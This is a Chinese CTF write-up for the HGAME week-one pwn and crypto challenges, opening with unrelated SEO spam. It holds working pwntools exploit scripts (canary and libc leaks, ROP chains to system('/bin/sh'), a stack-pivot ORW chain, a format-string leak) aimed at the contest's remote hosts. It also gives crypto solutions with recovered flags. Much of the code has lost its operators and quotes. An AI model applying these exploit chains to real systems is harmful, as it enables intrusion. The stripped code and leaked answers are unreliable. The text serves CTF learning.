女装电子商务网站建设,电影网站vps服务器,平原网站建设费用,体育西网站开发设计一共两周#xff0c;第一周说难也不难说简单也不简单。
pwn
counting petals
数组v7长度17#xff0c;输入16时v7[161]会发生溢出#xff0c;溢出到v8,v9,将其改大#xff0c;会输出canary和libc_start_main_ret的地址。第2次进来覆盖到返回地址写上ROP from pwn import…一共两周第一周说难也不难说简单也不简单。
pwn
counting petals
数组v7长度17输入16时v7[161]会发生溢出溢出到v8,v9,将其改大会输出canary和libc_start_main_ret的地址。第2次进来覆盖到返回地址写上ROP from pwn import *
context(archamd64, log_leveldebug)libc ELF(./libc.so.6)#p process(./vuln)
#gdb.attach(p, b*0x555555555535\nc)
p remote(node1.hgame.vidar.club, 30788)p.sendlineafter(btime?\n, b16)
for i in range(15):p.sendlineafter(b : , b0)p.sendlineafter(b : , str((0x1032)22).encode())
for i in range(6):p.sendlineafter(b : , b-)p.sendlineafter(bReply 1 indicates the former and 2 indicates the latter: , b1)
p.recvuntil(bLets look at the results.\n)
v p.recvuntil(b, dropTrue).decode().split( )
print(v)
libc.address int(v[18]) - 0x29d90
canary int(v[16])
pop_rdi libc.address 0x000000000002a3e5 # pop rdi ; ret
print(f{libc.address :x} {canary :x})p.sendlineafter(btime?\n, b16)
pay [0]*15[(0x1032)22, canary,0,pop_rdi1,pop_rdi,next(libc.search(b/bin/sh)), libc.sym[system]]
for i in pay:p.sendlineafter(b : , str(i).encode())p.sendlineafter(bReply 1 indicates the former and 2 indicates the latter: , b1)
p.sendline(bcat flag)
p.interactive()
#flag{b945024b-f973-497c-30e4-c14722593da5}
ezstack
PIE没开加载地址已知。溢出正好能覆盖到返回地址。
ssize_t __fastcall vuln(unsigned int a1)
{char buf[80]; // [rsp10h] [rbp-50h] BYREFprint(a1, unk_402018);print(a1, Thats all.\n);print(a1, Good luck.\n);return read(a1, buf, 0x60uLL);
}
先移栈到BSS再利用0x50的空间写ROP泄露libc再读入后续的ORW
from pwn import *
context(archamd64, log_leveldebug)#20.04 focal libc-2.31
libc ELF(./libc-2.31.so)
elf ELF(./vuln)leave_ret 0x401426
pop_rdi 0x0000000000401713 # pop rdi ; ret
pop_rsi 0x0000000000401711 # pop rsi ; pop r15 ; ret
pop_rbp 0x000000000040135d # pop rbp ; ret
bss 0x404800
ret pop_rdi1#p process(./vuln)
p remote(node2.hgame.vidar.club, 30598)
#p remote(localhost,9999)
#pause()#移栈到已知地址
pay flat(b\0*0x50, 0x404800, 0x4013d9)
p.sendafter(bGood luck.\n, pay)#输出got表得到libc
# -50 -40 -30 -20 -10 0
pay flat(pop_rsi,elf.got[write],b/flag\0\0\0,elf.plt[write],pop_rsi,bss-0x10,0,elf.plt[read],ret,ret, bss-0x58, leave_ret)
p.sendafter(bGood luck.\n, pay)libc.address u64(p.recv(8)) - libc.sym[write]
print(f{libc.address :x})
p.recv(0x58)pop_rsi libc.address 0x000000000002601f # pop rsi ; ret
pop_rdx libc.address 0x000000000015fae6 # pop rdx ; pop rbx ; ret
pop_rcx libc.address 0x000000000010257e # pop rcx ; pop rbx ; ret
pop_rax libc.address 0x0000000000036174 # pop rax ; ret
save_rdi libc.address 0x000000000013b631 # mov qword ptr [rsi], rdi ; ret
save_rax libc.address 0x000000000014852a # mov qword ptr [rsi 0x10], rax ; ret
syscall libc.sym[getpid]9#输出fordfd read
# -10 0 10 20 30 40
pay2 flat(pop_rsi, bss-0x100, save_rdi, elf.plt[write], pop_rdx,0xe0, 0,pop_rsi, bss0x40, elf.plt[read],ret,ret)
p.send(pay2)
forkfd u32(p.recv(4))
print(f{forkfd :x})
p.recv(0x5c)#bbs-100 socketid
#bbs-f0 rax
#bss-40 /flag
#open() 输出fd read
# 40 50 60 70 80
pay3 flat([ pop_rdi, bss-0x40, pop_rsi,0, pop_rax, 2, syscall,pop_rsi, bss-0x100, save_rax,
# 90 a0 b0 c0 d0pop_rdi, forkfd, pop_rsi, bss-0x1000x10, pop_rdx,8, 0, pop_rax, 1, syscall,
# e0 f0 100 110pop_rsi,bss0x120, pop_rdx, 0x800, 0, pop_rax, 0, syscall])
p.send(pay3)
filefd u64(p.recv(8))
print(f{filefd :x})#read(filefd, ) write(forkfd, )
pay4 flat([pop_rdi, filefd, pop_rsi, bss-0x100, pop_rdx,0x50,0, pop_rax,0, syscall,pop_rdi, forkfd, pop_rax, 1, syscall])
p.send(pay4)p.interactive()format
可以多次执行printf但每次最多3字符有个很老的板子 %*c第1个寄存器的指针被输出是个非常大的值输出被先写入缓冲区再输出。输出大量空格会填充缓冲区缓冲区后边的指针每次都会重新写入。再次输出%s就会带出libc地址。
另一种方法是多次输入%s.每次会多输出1个点而且后边又没有\0所以这个串会越来越长直到连上缓冲区里的指针。大概输出到到0xdb4才行。不过感觉比第1种时间还是短点。那个0x7fxxxxxxx确实是有点大了。只要docker能顶得住就行。
from pwn import *
context(archamd64, log_levelerror)libc ELF(./libc.so.6)#p process(./vuln)
#gdb.attach(p, b*0x4011ee\nc)
p remote(node2.hgame.vidar.club, 31824)print(rec...)
p.sendlineafter(bn , b2)
p.sendlineafter(btype something:, b%*c)
p.sendlineafter(btype something:, b%s\0)
context.log_leveldebuglibc.address u64(p.recvuntil(b\x7f)[-6:]b\0\0) - libc.sym[_IO_2_1_stdin_]
print(f{libc.address :x})pop_rdi libc.address 0x000000000002a3e5 # pop rdi ; retp.sendlineafter(bn , str(-8).encode())
#p.sendafter(btype something:, bA*4flat(0, pop_rdi1, pop_rdi,next(libc.search(b/bin/sh)), libc.sym[system]))
p.send(bA*5flat(0, pop_rdi1, pop_rdi,next(libc.search(b/bin/sh)), libc.sym[system]))sleep(0.5)
p.sendline(bcat /flag)
p.interactive()
crypto
suprimeRSA
p k*Mpow(e,a,M) RSAlib-cve漏洞这东西原来没见过作起来难成。跟上一题一样自己想确实比较不能实现。直接用ROCA代码爆破分解就行了。
from Crypto.Util.number import *
import random
from sympy import primeFLAGbhgame{xxxxxxxxxxxxxxxxxx}
e0x10001def primorial(num):result 1for i in range(1, num 1):result * prime(i) #取前num个素数相乘return result
Mprimorial(random.choice([39,71,126])) #39def gen_key():while True:k getPrime(random.randint(20,40))a getPrime(random.randint(20,60))p k * M pow(e, a, M)if isPrime(p):return pp,qgen_key(),gen_key()
np*q
mbytes_to_long(FLAG)
encpow(m,e,n)print(f{n})
print(f{enc})
n787190064146025392337631797277972559696758830083248285626115725258876808514690830730702705056550628756290183000265129340257928314614351263713241
enc365164788284364079752299551355267634718233656769290285760796137651769990253028664857272749598268110892426683253579840758552222893644373690398408#https://asecuritysite.com/encryption/copper
#ROCA 素数生成漏洞
p954455861490902893457047257515590051179337979243488068132318878264162627
q824752716083066619280674937934149242011126804999047155998788143116757683
long_to_bytes(int(pow(enc,inverse_mod(e,(p-1)*(q-1)),n)))
#hgame{ROCA_ROCK_and_ROll!}
┌──(kali㉿kali)-[~/ctf/2502/roca]
└─$ sage -python roca_attack.py 3%|████▏ | 2/61 [02:221:09:27, 70.64s/it]found factorization:
p954455861490902893457047257515590051179337979243488068132318878264162627
q8247527160830666192806749379341492420111268049990471559987881431167576833%|████▏ | 2/61 [02:551:26:12, 87.66s/it]这个漏洞的M是前n个素数的积对于小于960位的是前39个ROCA用前37个减小模同样减小爆破范围可以在60000将左右完成。不过这题有第1板没作出来这是换了附件的。原来的M是5128这个用这个ROCA没效果。现在也不清楚已经出了的8个人怎么弄的。
easyBag
from Crypto.Util.number import *
import random
from Crypto.Cipher import AES
import hashlib
from Crypto.Util.Padding import pad
from secrets import flaglist []
bag []
prandom.getrandbits(64)
assert len(bin(p)[2:])64
for i in range(4):t pa[getPrime(32) for _ in range(64)]b0for i in a:tempt%2btemp*itt1list.append(a)bag.append(b)
print(flist{list})
print(fbag{bag})key hashlib.sha256(str(p).encode()).digest()
cipher AES.new(key, AES.MODE_ECB)
flag pad(flag,16)
ciphertext cipher.encrypt(flag)
print(fciphertext{ciphertext})p*Abag 一个简单的背包问题。不过有个坑用BKZ才出结果。
| |
|p0 p1 ...|*|a0 a1 a2 a3| |b0 b1 ...|| |
A matrix(ZZ,list).T
B matrix(ZZ,bag)
M block_matrix(ZZ,[[1,A],[0,B]])v M.BKZ()
a -1*v[-1]
p int(.join(map(str,a[:-4][::-1])),2)
#17739748707559623655
key hashlib.sha256(str(p).encode()).digest()
cipher AES.new(key, AES.MODE_ECB)
cipher.decrypt(ciphertext)
#bhgame{A_S1mple_Modulr_Subset_Sum_Problem}\x06\x06\x06\x06\x06\x06
sieve
#sage
from Crypto.Util.number import bytes_to_long
from sympy import nextprimeFLAG bhgame{xxxxxxxxxxxxxxxxxxxxxx}
m bytes_to_long(FLAG)def trick(k):if k 1:mul prod(range(1,k)) if k - mul % k - 1 0:return euler_phi(k) trick(k-1) 1 #素数 ktrick(k-1)else:return euler_phi(k) trick(k-1)else:return 1e 65537
p q nextprime(trick(e^2//6)128)
n p * q
enc pow(m,e,n)
print(f{enc})
#enc2449294097474714136530140099784592732766444481665278038069484466665506153967851063209402336025065476172617376546这个递归函数是运行不了的。里面包含级数级别的重复运算。但也很容易理解1到n,当值是素数的时候是phi(k)1也就是k,当是合数的时候就是phi(k)所以就是1-n的sum(phi())素数的个数。
于是花了很长时间想办法。因为有个提示是二筛。
后来搜OEIS得到phi(n)和的序列这个没有算法沿着这搜到a(n)1也就是这个序列和1
另一个数素数的个数在sage里有函数prime_pi
#从OEIS查序列
#n以内phi(n)的和a(n) A005728a(n)1 Number of fractions in Farey series of order n.AA {} #优化字典避免重复查询
def A005728(n):if n 0:return 1c, j -2, 2k1 n//jwhile k1 1:j2 n//k1 1if k1 in AA:v AA[k1]else:v A005728(k1)AA[k1]vc (j2-j)*(2*v-3)j, k1 j2, n//j2return (n*(n-1)-cj)//2m e**2//6
s_phi A005728(m)
#155763335410704473s_pi prime_pi(e^2//6) #37030583 sage函数
s s_phi-1s_pi
p next_prime(s128)
m long_to_bytes(int(pow(enc,inverse_mod(e,p*(p-1)),p*p)))
print(m)
#hgame{sieve_is_n0t_that_HArd}
